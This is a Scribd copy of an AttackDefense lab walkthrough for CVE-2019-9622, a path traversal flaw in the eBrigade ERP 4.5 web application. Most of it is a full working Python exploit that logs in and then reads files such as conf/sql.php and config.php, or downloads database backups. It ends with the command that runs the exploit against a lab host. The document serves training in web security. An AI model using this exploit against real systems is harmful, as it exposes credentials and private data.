Scribd
Upload
47 views9 pages

Walkthrough 1357

The document describes how to exploit CVE-2019-9622 in an eBrigade ERP web application. It involves 4 steps: 1) inspecting the web app, 2) searching for exploits of the vulnerability online, 3) modifying a Python script to include the correct credentials, and 4) running the script against the target URL to allow arbitrary file downloading. The vulnerability allows an attacker to download files from the webroot directory.

Uploaded by

Adrian Dolbuck
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
47 views9 pages

Walkthrough 1357

The document describes how to exploit CVE-2019-9622 in an eBrigade ERP web application. It involves 4 steps: 1) inspecting the web app, 2) searching for exploits of the vulnerability online, 3) modifying a Python script to include the correct credentials, and 4) running the script against the target URL to allow arbitrary file downloading. The vulnerability allows an attacker to download files from the webroot directory.

Uploaded by

Adrian Dolbuck
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 9

Name CVE-2019-9622

URL https://attackdefense.com/challengedetails?cid=1357

Type Webapp CVEs : 2019

Important Note: This document illustrates all the important steps required to complete this lab.
This is by no means a comprehensive step-by-step solution for this exercise. This is only
provided as a reference to various commands needed to complete this exercise and for your
further research on this topic. Also, note that the IP addresses and domain names might be
different in your lab.

Solution:

The web application is vulnerable to CVE-2019-9622

Step 1: ​Inspect the web application.


Step 2: ​Search on google “CVE-2019-9622”.
The exploit db link contains the script which can be used to exploit the vulnerability.

Exploit DB Link: ​https://www.exploit-db.com/exploits/46109

Step 3: ​ The user credentials are required to be specified in the python script. Update the
credentials in the python script. The login credentials of the web application are provided in the
challenge description.

● Username: 1234
● Password: 1234

Modified Python script:

#!/usr/bin/python

import mechanize, sys, cookielib, requests


import colorama, urllib, re, random, urllib2
import wget
from colorama import Fore
from tqdm import tqdm
from pathlib import Path
def bannerche():
print '''
@-------------------------------------------------------------@
| eBrigade ERP <= 4.5 - Database Backup Disclosure via AFD |
| Vulnerability discovered by AkkuS |
| My Blog - https://pentest.com.tr |
@-------------------------------------------------------------@
'''
bannerche()

if (len(sys.argv) != 2):
print "[*] Usage: exploit.py http://127.0.0.1/"
exit(0)

rhost = sys.argv[1]
UserName = "1234" # Administrator/User Username Input
Password = "1234" # Administrator/User Password Input

print(Fore.BLUE + "+ [*] Getting login permission...")


br = mechanize.Browser() # set cookies
br.set_handle_robots(False)
cj = cookielib.LWPCookieJar()
br.set_cookiejar(cj)

br.open(rhost+"/") # User Access Login


assert br.viewing_html()
br.select_form(nr=0)
br.form['id'] = UserName
br.form['pwd'] = Password
br.submit()

##
# Login Access and Version Control
##

LoginControl = requests.get(rhost+"/index_d.php", cookies=cj)


HTMLdata = LoginControl.text

finder = re.findall(r'version<b> 4.5', HTMLdata)


try:
version = finder[0].replace('"','').replace('<b>','').strip()
except IndexError:
pass
try:
if version == "version 4.5":
print (Fore.GREEN + "+ [*] Login successful")
except NameError:
pass
print (Fore.RED + "+ [*] User information is incorrect or version incompatible")
##
# Introducing Cookie and CSRF token information
##

print (Fore.BLUE + "+ [*] Select Exploit Type:")


print (Fore.YELLOW +"- [*] 1 - Arbitrary File Download/Read (Ex: /conf/sql.php)")
print ("- [*] 2 - Database Backup File Download")
choice = int(raw_input("- [*] Enter a number (1 or 2) : "))

if choice == 1:
print (Fore.BLUE + "+ [*] Select the file you want to Download/Read:")
print (Fore.YELLOW + "- [*] 1 - /conf/sql.php")
print ("- [*] 2 - /config.php")
print ("- [*] 3 - /.htaccess.template")
print ("- [*] 4 - Manual exploitation")
AFDc = int(raw_input("- [*] Enter a number : "))
if AFDc == 1:
AFD1 = requests.get(rhost+"/showfile.php?section=0&pompier=1&file=../../../conf/sql.php", cookies=cj)
print AFD1.text
elif AFDc == 2:
AFD2 = requests.get(rhost+"/showfile.php?section=0&pompier=1&file=../../../config.php", cookies=cj)
print AFD2.text
elif AFDc == 3:
AFD3 = requests.get(rhost+"/showfile.php?section=0&pompier=1&file=../../../.htaccess.template", cookies=cj)
print AFD3.text
elif AFDc == 4:
print (Fore.RED +"- [!] You must have knowledge of files and directories")
AFDmc = str(raw_input(Fore.BLUE + "+ [*] Enter file name (Ex: /lib/PHPMailer/class.smtp.php) : "))
AFD4 = requests.get(rhost+"/showfile.php?section=0&pompier=1&file=../../.."+AFDmc+"", cookies=cj)
if AFD4.status_code == 200:
try:
mdata = AFD4.text
Le = re.findall(r'javascript:history.back', mdata)
LeClean = Le[0].replace('"','').strip()
if LeClean == "javascript:history.back":
print (Fore.RED + "+ [X] The directory and file name you entered could not be found or incorrect")
except IndexError:
pass
print AFD4.text
else:
print (Fore.RED + "+ [X] Unable to access file")
sys.exit()
else:
print("Invalid input!")
elif choice == 2:

backupfiles = requests.get(rhost+"/restore.php?file=", cookies=cj)


RecentesData = backupfiles.text
finder = re.findall(r'a href=".*"', RecentesData)
names = finder[0].replace('"','').replace('javascript:deletefile','').replace('a
href=javascript:restore','').replace('save','').replace("'",'').replace('(','').replace(')','').replace(',','').strip()
print ("+ [*] Backup File Name : " + names)

DB = requests.get(rhost+"/showfile.php?section=0&pompier=1&file=../../../user-data/save/"+names+"", cookies=cj)

with open(names, "wb") as handle:


for data in tqdm(DB.iter_content()):
handle.write(data)

p = str(Path.cwd())
print(Fore.GREEN + "+ [*] Backup successfully downloaded. Directory path : " + p + "/" + names)
else:
print("Invalid input!")

# end
Save the python script as “exploit.py
Step 4: ​Run the python script with URL of target as argument.

Command: ​python2 exploit.py


"http://oicbicw6kg7ppwdqatolmez67.stager3.attackdefenselabs.com"
The vulnerability allows an attacker to download any arbitrary file present inside the webroot
directory.

References:

1. eBrigade (​https://ebrigade.net/​)
2. CVE-2019-9622 (​https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9622​)
3. eBrigade ERP 4.5 - Arbitrary File Download (​https://www.exploit-db.com/exploits/46109​)

You might also like